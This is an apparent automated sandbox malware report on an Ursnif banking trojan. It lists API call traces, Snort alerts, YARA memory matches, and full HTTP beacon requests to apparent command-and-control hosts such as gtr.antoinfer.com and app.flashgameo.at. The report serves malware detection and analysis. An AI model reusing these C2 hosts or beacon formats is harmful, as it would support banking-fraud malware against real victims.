Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0312CA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03140F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05380F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05379386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0536CA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_03126457 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49722 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49722 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49723 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49723 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49724 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49724 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49725 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49726 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49726 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49727 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49727 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49738 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49738 -> 185.228.233.17:80

Source: Joe Sandbox View

ASN Name: ITOS-ASRU ITOS-ASRU

Source: global traffic	HTTP traffic detected: GET /FXZ4lJvs/pnPhoUboMRVeoTe_2BxFQHV/VrMabiiED1/fjSHMBnhaHvqGkBru/BBTTQ6QwiwG2/i_2B4XLvHY3/zQLJ0W4RRFNlvQ/B3u_2FSgrcZQDj_2BbFWa/Bx8WB7z_2BuLUgre/PCgyAB0W6V5ZAPj/EUhKDrtuQoVEfKF_2F/dcW7lxG1t/oqJkrgpYdakzYVLuFura/45KMjCH_2BPWhKVH2At/F3l8q550AYqbFa84glQVmt/K2gCe0Lr0TKfs/y_2FaOCB/ygw2OjZ6hu69MXjNR4EuLCN/Av5n84Tspg/9rzu_2F5EAjaDhz2A/PQ8PWyfZ/9t_2F HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /xeokJbRqOl3gRd/X3OYN3TXIyfP1rKJadFox/hkDEMFqGc3z5N0jb/OSe88cYQHbyuSyF/L_2BGXtQlRaEWOYgGy/iGe9pg_2B/kC4LmyHng_2FvJ1rpXvU/r_2BZHx4cR2W2aSgMrL/JfmqfENA8zSGFufIIE0hzo/19OQbirroLXoz/7woD_2Fn/PEok8EnxPZROEqPbm_2BBd4/HH8ql3GbQ8/5Mk8GmbHI0E_2BK8q/0FGuRwkqUf0g/VJJie0BY_2B/zf4uXegc1oUq1M/kGjn1PvLWjrBuIQHmv_2B/3Va8kJS9ZeQUj30z/_2FoWBI8OFd1rcBCCFd/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /DeX5GWZg0Peq/7NgceSVLwb_/2FKBdrhD_2BrPB/8c1uiDVblu0VRxOwf86RB/7RlrJfNAcSl8yK9M/_2BR6tZsQdJK7DQ/0XeQ_2FDLrv1nAxzaB/T3xKAFAr_/2Fp4Ltq73VjaHHoQztD1/x183TFWpQzC6_2F2n_2/FW_2BJ7_2BLURkcNjyg4hv/iERXmjmDxZ_2B/MqlUCL1c/d0YTAfP_2B2t_2FpDPiA4C7/kp7kRE_2BM/6ThuCNdgd0HyvWufQ/x61l_2FymcLS/YGjjC9Byoh4/QKUChdjQOX9Lh8/tWuTsS4vrxaovoeb8MTe0/n0ug3jEb10v8CjXy/4y_2Bffi5hDHF4e/taOpwFWZ_2FIS/gE HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /xpQtxUX3h_2FQKxJhfUx/G0zs_2BNyFnX7DIXqIv/lnFizf7MXIsO8WrV7iWZn_/2BjQPC7zwHzVS/342TzGfK/2qMhdDtEUWr3PuMULGHY7Wo/oH2PWiLOuv/rVab55pGcs3BjCEFy/fjf5J0mtPw74/bUga6aKy9a0/8sjdMu3LKL0W9F/lJKdHZn6kyKDin_2BwMdR/Co0bi6iqwKADh3im/EkdX1PzjugiiFzL/eq7opWWHrRFIO6DADe/KGFblEs7Y/dlX3yYwk_2BuqKiUtLfZ/ayAcx2n0s2knyq63tAp/4ZU8TWhq99lb0QUr9JY6xW/K9imquPwClp_2Bwu/6UIrfdf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /08OjUeXqnP9/J746P5EGkluNVd/IJ_2B0pRlg5g_2Fpunyf_/2BXLVHvYLaERgrs5/6QTGZHoxYTnKCap/ZPQAuenP_2FyJ6hWxg/pWql_2F5l/kLJRoq5u3UoR4652KiHp/EmofwTCfdG6EODl70rf/KEalVhNFb6NVkmQGTmfz_2/B7kttRIp_2Bne/TjMfdOpf/19l29_2BHFRm1Q66bkvKZWZ/DZZfqXshBY/y14LEgOTtytG3Ix8L/xeX8bRPtnh6u/r2W_2BXkRqN/peDwoZDDU11DTW/WVHbt8_2BPQcYfD7tFwK0/zJnaF28QV4LV_2F7/vA9Gd_2F8SeHe3M/sh52_2Bep9d5h/oiu8Z2yw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /mTRcVo1kR/Y_2FA_2BfssGFqVyATv2/Ha48GIz6nIiYpIeUH4v/_2FG2EmK4VeNaMJVBDrk0J/_2B1TzmrJnGIJ/nya_2F8I/cdZf2M97sVJPBZwkgGorhXf/mRYeY9vLlb/ql65kRpFXqGZwBQer/rXMufQHq_2FU/nIy69w6PhML/8J3AhNFQ4Jy96G/w5vhfh_2BIJ7d9IoLb98y/oKxTbr81HhqnJ1L1/Jh1VS63mbokZ6cg/EiF4xFifMJVfOHV2Q_/2FlZvyJ76/jzog_2BoRPm_2FGOWmRI/FPnBmD_2BoCBmqUOVLw/rpKEm_2F86qO2njAFbe3qJ/1v9sWMzqblkv_/2F_2BDgW007d7/LtA8 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /p0mrlA_2F3nwmuOO5YjXTbA/cd8IEyE4_2/FI8A_2FRC5apSNIFU/7NfGVV9uGpRL/s6DAoaMbBtN/eYfp7C4d_2F3Is/s4XG4SPnRiQ7lPcEUOZTG/dYTbEto_2F1qrOzS/I0vg3Aj3uP5f_2F/4uoaP31e5KEGdC1u9L/oWhwQd6oE/Nvhp83GHi3mH9zcVaKW0/JwD5AHcQxGrogNbSOUn/soZuo4elXh3sevhCFwKNDb/LefWHBaTOp39g/WKwxmRdA/L1LsDG1W8J3kilFzwHSP3cM/ofk_2BkzS2/fYG6a0xp2L0bHH9qT/VzjD_2B4vW7z/v2KCn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: app.flashgameo.at
Source: global traffic	HTTP traffic detected: POST /OiT_2FirHnJjoHi9Wz9/lRYYufFMTul_2B_2BY5CkW/SD8SHNDbwgWIv/CzkJRl4V/2qlIA9Op7QeGDe_2FdwjIV7/xPEy8vzfH2/VxoY4K2lc_2FXWXvK/mDsSgC08BTqd/mqIKDTZ_2F9/kA8vkXWNOd488F/ErqgFvCrl5Yz6usP1jvws/BevN_2BeaMhEHvMh/FRgus9uETEHjdsv/FSZwcCE4sYXuHvntAo/tvQ8Ok9Ns/ghPnWtwC3QyjsPH942Uo/R1DuZ1r1nnC3Zyx8YUp/2fidg_2Fh8kkAMOPis4sXs/5aKWUUxdSRpaI/n_2FzGZTe/pJ3zVp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: app.flashgameo.at

Source: global traffic	HTTP traffic detected: GET /FXZ4lJvs/pnPhoUboMRVeoTe_2BxFQHV/VrMabiiED1/fjSHMBnhaHvqGkBru/BBTTQ6QwiwG2/i_2B4XLvHY3/zQLJ0W4RRFNlvQ/B3u_2FSgrcZQDj_2BbFWa/Bx8WB7z_2BuLUgre/PCgyAB0W6V5ZAPj/EUhKDrtuQoVEfKF_2F/dcW7lxG1t/oqJkrgpYdakzYVLuFura/45KMjCH_2BPWhKVH2At/F3l8q550AYqbFa84glQVmt/K2gCe0Lr0TKfs/y_2FaOCB/ygw2OjZ6hu69MXjNR4EuLCN/Av5n84Tspg/9rzu_2F5EAjaDhz2A/PQ8PWyfZ/9t_2F HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /xeokJbRqOl3gRd/X3OYN3TXIyfP1rKJadFox/hkDEMFqGc3z5N0jb/OSe88cYQHbyuSyF/L_2BGXtQlRaEWOYgGy/iGe9pg_2B/kC4LmyHng_2FvJ1rpXvU/r_2BZHx4cR2W2aSgMrL/JfmqfENA8zSGFufIIE0hzo/19OQbirroLXoz/7woD_2Fn/PEok8EnxPZROEqPbm_2BBd4/HH8ql3GbQ8/5Mk8GmbHI0E_2BK8q/0FGuRwkqUf0g/VJJie0BY_2B/zf4uXegc1oUq1M/kGjn1PvLWjrBuIQHmv_2B/3Va8kJS9ZeQUj30z/_2FoWBI8OFd1rcBCCFd/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /DeX5GWZg0Peq/7NgceSVLwb_/2FKBdrhD_2BrPB/8c1uiDVblu0VRxOwf86RB/7RlrJfNAcSl8yK9M/_2BR6tZsQdJK7DQ/0XeQ_2FDLrv1nAxzaB/T3xKAFAr_/2Fp4Ltq73VjaHHoQztD1/x183TFWpQzC6_2F2n_2/FW_2BJ7_2BLURkcNjyg4hv/iERXmjmDxZ_2B/MqlUCL1c/d0YTAfP_2B2t_2FpDPiA4C7/kp7kRE_2BM/6ThuCNdgd0HyvWufQ/x61l_2FymcLS/YGjjC9Byoh4/QKUChdjQOX9Lh8/tWuTsS4vrxaovoeb8MTe0/n0ug3jEb10v8CjXy/4y_2Bffi5hDHF4e/taOpwFWZ_2FIS/gE HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /xpQtxUX3h_2FQKxJhfUx/G0zs_2BNyFnX7DIXqIv/lnFizf7MXIsO8WrV7iWZn_/2BjQPC7zwHzVS/342TzGfK/2qMhdDtEUWr3PuMULGHY7Wo/oH2PWiLOuv/rVab55pGcs3BjCEFy/fjf5J0mtPw74/bUga6aKy9a0/8sjdMu3LKL0W9F/lJKdHZn6kyKDin_2BwMdR/Co0bi6iqwKADh3im/EkdX1PzjugiiFzL/eq7opWWHrRFIO6DADe/KGFblEs7Y/dlX3yYwk_2BuqKiUtLfZ/ayAcx2n0s2knyq63tAp/4ZU8TWhq99lb0QUr9JY6xW/K9imquPwClp_2Bwu/6UIrfdf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /08OjUeXqnP9/J746P5EGkluNVd/IJ_2B0pRlg5g_2Fpunyf_/2BXLVHvYLaERgrs5/6QTGZHoxYTnKCap/ZPQAuenP_2FyJ6hWxg/pWql_2F5l/kLJRoq5u3UoR4652KiHp/EmofwTCfdG6EODl70rf/KEalVhNFb6NVkmQGTmfz_2/B7kttRIp_2Bne/TjMfdOpf/19l29_2BHFRm1Q66bkvKZWZ/DZZfqXshBY/y14LEgOTtytG3Ix8L/xeX8bRPtnh6u/r2W_2BXkRqN/peDwoZDDU11DTW/WVHbt8_2BPQcYfD7tFwK0/zJnaF28QV4LV_2F7/vA9Gd_2F8SeHe3M/sh52_2Bep9d5h/oiu8Z2yw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /mTRcVo1kR/Y_2FA_2BfssGFqVyATv2/Ha48GIz6nIiYpIeUH4v/_2FG2EmK4VeNaMJVBDrk0J/_2B1TzmrJnGIJ/nya_2F8I/cdZf2M97sVJPBZwkgGorhXf/mRYeY9vLlb/ql65kRpFXqGZwBQer/rXMufQHq_2FU/nIy69w6PhML/8J3AhNFQ4Jy96G/w5vhfh_2BIJ7d9IoLb98y/oKxTbr81HhqnJ1L1/Jh1VS63mbokZ6cg/EiF4xFifMJVfOHV2Q_/2FlZvyJ76/jzog_2BoRPm_2FGOWmRI/FPnBmD_2BoCBmqUOVLw/rpKEm_2F86qO2njAFbe3qJ/1v9sWMzqblkv_/2F_2BDgW007d7/LtA8 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /p0mrlA_2F3nwmuOO5YjXTbA/cd8IEyE4_2/FI8A_2FRC5apSNIFU/7NfGVV9uGpRL/s6DAoaMbBtN/eYfp7C4d_2F3Is/s4XG4SPnRiQ7lPcEUOZTG/dYTbEto_2F1qrOzS/I0vg3Aj3uP5f_2F/4uoaP31e5KEGdC1u9L/oWhwQd6oE/Nvhp83GHi3mH9zcVaKW0/JwD5AHcQxGrogNbSOUn/soZuo4elXh3sevhCFwKNDb/LefWHBaTOp39g/WKwxmRdA/L1LsDG1W8J3kilFzwHSP3cM/ofk_2BkzS2/fYG6a0xp2L0bHH9qT/VzjD_2B4vW7z/v2KCn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: app.flashgameo.at

Source: unknown

DNS traffic detected: queries for: gtr.antoinfer.com

Source: unknown

HTTP traffic detected: POST /OiT_2FirHnJjoHi9Wz9/lRYYufFMTul_2B_2BY5CkW/SD8SHNDbwgWIv/CzkJRl4V/2qlIA9Op7QeGDe_2FdwjIV7/xPEy8vzfH2/VxoY4K2lc_2FXWXvK/mDsSgC08BTqd/mqIKDTZ_2F9/kA8vkXWNOd488F/ErqgFvCrl5Yz6usP1jvws/BevN_2BeaMhEHvMh/FRgus9uETEHjdsv/FSZwcCE4sYXuHvntAo/tvQ8Ok9Ns/ghPnWtwC3QyjsPH942Uo/R1DuZ1r1nnC3Zyx8YUp/2fidg_2Fh8kkAMOPis4sXs/5aKWUUxdSRpaI/n_2FzGZTe/pJ3zVp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: app.flashgameo.at

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Aug 2021 18:27:51 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: loaddll32.exe, 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, control.exe, 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, control.exe, 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000013.00000003.431870631.00000204EF5B0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, control.exe, 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000019.00000002.553214576.0000011326CB0000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000013.00000002.523197029.0000020480001000.00000004.00000001.sdmp, powershell.exe, 00000019.00000002.552701952.0000011326AA1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000019.00000002.553214576.0000011326CB0000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.553214576.0000011326CB0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.397556594.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374227278.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434060838.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397622522.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397589601.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451828519.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434180314.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.433841942.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451943735.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434086354.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.433993641.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374321927.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.381487289.0000000003D4C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.400741331.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.406917672.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397430655.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374277769.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451905542.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374345773.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374301760.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397475800.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451696004.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397396701.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434150338.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.543947285.000000000F1EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434024374.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.377109820.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.433927552.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374368880.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397343718.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397511011.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374359544.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374253980.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2224, type: MEMORYSTR

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.397556594.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374227278.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434060838.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397622522.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397589601.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451828519.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434180314.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.433841942.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451943735.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434086354.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.433993641.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374321927.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.381487289.0000000003D4C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.400741331.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.406917672.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397430655.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374277769.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451905542.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374345773.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374301760.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397475800.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451696004.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397396701.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434150338.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
